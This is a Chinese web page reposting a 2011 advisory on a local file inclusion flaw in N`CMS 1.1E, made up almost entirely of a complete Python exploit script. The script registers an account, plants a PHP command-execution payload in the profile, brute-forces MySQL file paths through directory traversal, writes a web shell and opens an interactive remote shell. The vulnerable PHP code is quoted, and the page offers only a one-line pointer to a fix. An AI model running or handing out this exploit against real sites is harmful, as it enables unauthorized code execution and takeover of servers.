客服中心
业务咨询
技术支持
在线客服
N`CMS 1.1E 本地文件包含漏洞及修复
添加时间:2011-3-12
添加:
admin
N`CMS 是一款内容管理系统,N`CMS 存在本地文件包含漏洞,可能导致敏感信息泄露。
[+]info:
~~~~~~~~~
N`CMS 1.1E Pre-Auth Local File Inclusion Remote Code Exploit
[+]poc:
~~~~~~~~~
#!/usr/bin/python # ~INFORMATION # Exploit Title: N`CMS 1.1E Pre-Auth Local File Inclusion Remote Code Exploit # Date: 11/3/2011 # Software link: http://bit.ly/eJAyw5 # Tested on: Linux bt # Version: 1.1E # PHP.ini Settings: gpc_magic_quotes = Off # Note: The web application was lucky to not be exploited by session # injection with a malicious username example <?php system($_GET[cmd])> # as htmlentities() encoded the bracket :-) # ~VULNERABLE CODE ''' <?php if( isset( $_GET['page'] ) ) { if( file_exists( 'page/'.$_GET['page'].'.php' ) ) { include( 'page/'.$_GET['page'].'.php' ); } else { include( 'page/404.php' ); } } else { include( 'page/home.php' ); } ?> ''' import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass from optparse import OptionParser from urlparse import urlparse,urljoin from urllib import urlopen from cookielib import CookieJar __CONTACT__ ="TecR0c(tecr0c@tecninja.net)" __DATE__ ="11.3.2011" usage = 'Example : %s http://localhost/ncms/ -c user:pass -w databases.txt -p 127.0.0.1:8080' % __file__ parser = OptionParser(usage=usage) parser.add_option("-p","--proxy", type="string",action="store", dest="proxy", help="HTTP Proxy <server>:<port>") parser.add_option("-w","--wordlist", type="string",action="store", dest="wordlist", help="file to use to bruteforce database") parser.add_option("-c","--credentials", type="string",action="store", dest="credentials",default="hacker:ph33r", help="credentials for login, " "or [default: %default]") (options, args) = parser.parse_args() if options.proxy: print '[+] Using Proxy'+options.proxy # User Agents agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ", "Google Chrome 0.2.149.29 (Windows XP)", "Opera 9.25 (Windows Vista)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Opera/8.00 (Windows NT 5.1; U; en)"] agent = random.choice(agents) traversal = './../../../../../../../..' def banner(): if os.name == "posix": os.system("clear") else: os.system("cls") header = ''' |----------------------------------------| |Exploit: N'CMS LFI RCE |Author: %s |Date: %s |----------------------------------------|\n '''%(__CONTACT__,__DATE__) for i in header: print "\b%s"%i, sys.stdout.flush() time.sleep(0.005) def proxyCheck(): if options.proxy: try: h2 = httplib.HTTPConnection(options.proxy) h2.connect() print "[+] Using Proxy Server:",options.proxy except(socket.timeout): print "[-] Proxy Timed Out\n" pass sys.exit(1) except(NameError): print "[-] Proxy Not Given\n" pass sys.exit(1) except: print "[-] Proxy Failed\n" pass sys.exit(1) def getProxy(): try: proxy_handler = urllib2.ProxyHandler({'http': options.proxy}) except(socket.timeout): print "\n[-] Proxy Timed Out" sys.exit(1) return proxy_handler cj = CookieJar() if options.proxy: opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj)) else: opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) opener.addheaders = [('User-agent', agent)] def registerUser(): webSiteUrl = url.geturl()+"?page=register" parameters = {'login' : username,'password': password,'password2' : password,'email' : 'test@test.com', 'register' : '+Enregistrer+'} encodedParameters = urllib.urlencode(parameters) try: opener.open(webSiteUrl, encodedParameters).read() except: print '[-] Failed' sys.exit() print '[+] Created User, '+username def edit_profile(): webSiteUrl = url.geturl()+"?page=edit_profil" parameters = { 'User-Agent' : agent, 'profil' : '<?php system(base64_decode($_REQUEST["cmd"]));?>','edit_profil' : '+Enregistrer+'} encodedParameters = urllib.urlencode(parameters) try: response = opener.open(webSiteUrl, encodedParameters).read() except: print '[-] Failed' sys.exit() print '[+] Added Payload To Page' def login(): """ Add php payload to database """ webSiteUrl = url.geturl()+"?page=register" parameters = {'login' : username,'password' : password,'actplayer' : 'login'} encodedParameters = urllib.urlencode(parameters) try: opener.open(webSiteUrl, encodedParameters).read() except: print '[-] Failed' sys.exit() print '[+] Authenticated To Website' def traversalCmd(encodedCommand,database): webSiteUrl = url.geturl()+"?page="+traversal+"/var/lib/mysql/"+database+"/accounts.MYD%00" parameters = {'cmd' : encodedCommand} encodedParameters = urllib.urlencode(parameters) try: opener.open(webSiteUrl, encodedParameters).read() except: print '[-] Failed' sys.exit() def postRequestWebShell(encodedCommand): webSiteUrl = url.geturl()+'.shell.php' commandToExecute = [ ('cmd',encodedCommand)] cmdData = urllib.urlencode(commandToExecute) try: response = opener.open(webSiteUrl, cmdData).read() except: print '[-] Failed' sys.exit() return response def fileCheck(): webSiteUrl = url.geturl()+"?page="+traversal+"/var/lib/mysql/mysql_upgrade_info%00" try: response = opener.open(webSiteUrl).read() except: print '[-] Failed' sys.exit() doesntExist = re.compile(r"Erreur 404") findAnswer = doesntExist.search(response) if findAnswer: "[-] Can Not Use This Techinque" sys.exit() def bruteForceDatabase(): try: databases = open(options.wordlist, "r").readlines() print "[+] Length Of Wordlist: "+str(len(databases)) except(IOError): print "[-] Error: Check Your Wordlist Path\n" sys.exit(1) for database in databases: database = database.replace("\r","").replace("\n","") webSiteUrl = url.geturl()+"?page="+traversal+"/var/lib/mysql/"+database+"/accounts.MYD%00" print '[X] Testing Database Name: '+database try: response = opener.open(webSiteUrl).read() except urllib2.HTTPError, error: print '[-] Failed' payload = re.compile(r"Erreur 404") findPayload = payload.search(response) if not findPayload: print '[+] Found Database: '+database+'\n' commandLine(database) def commandLine(database): encodedCommand = "echo '<?php system(base64_decode($_REQUEST[cmd]));?>' > .shell.php" encodedCommand = base64.b64encode(encodedCommand) traversalCmd(encodedCommand,database) commandLine = ('[RSHELL] %s@%s# ') % (getpass.getuser(),url.netloc) while True: try: command = raw_input(commandLine) encodedCommand = base64.b64encode(command) response = postRequestWebShell(encodedCommand) print response except KeyboardInterrupt: encodedCommand = base64.b64encode('rm .shell.php') postRequestWebShell(encodedCommand) print "\n[!] Removed .shell.php\n" sys.exit() if "__main__" == __name__: banner() try: url=urlparse(args[0]) except: parser.print_help() sys.exit() getProxy() username, password = options.credentials.split(':') proxyCheck() registerUser() login() edit_profile() fileCheck() bruteForceDatabase() 修复:本地包含漏洞修复请查阅本站
关健词:N`CMS
新文章:
- CentOS7下图形配置网络的方法
- CentOS 7如何添加删除用户
- 如何解决centos7双系统后丢失windows启动项
- CentOS单网卡如何批量添加不同IP段
- CentOS下iconv命令的介绍
- Centos7 SSH密钥登陆及密码密钥双重验证详解
- CentOS 7.1添加删除用户的方法
- CentOS查找/扫描局域网打印机IP讲解
- CentOS7使用hostapd实现无AP模式的详解
- su命令不能切换root的解决方法
- 解决VMware下CentOS7网络重启出错
- 解决Centos7双系统后丢失windows启动项
- CentOS下如何避免文件覆盖
- CentOS7和CentOS6系统有什么不同呢
- Centos 6.6默认iptable规则详解
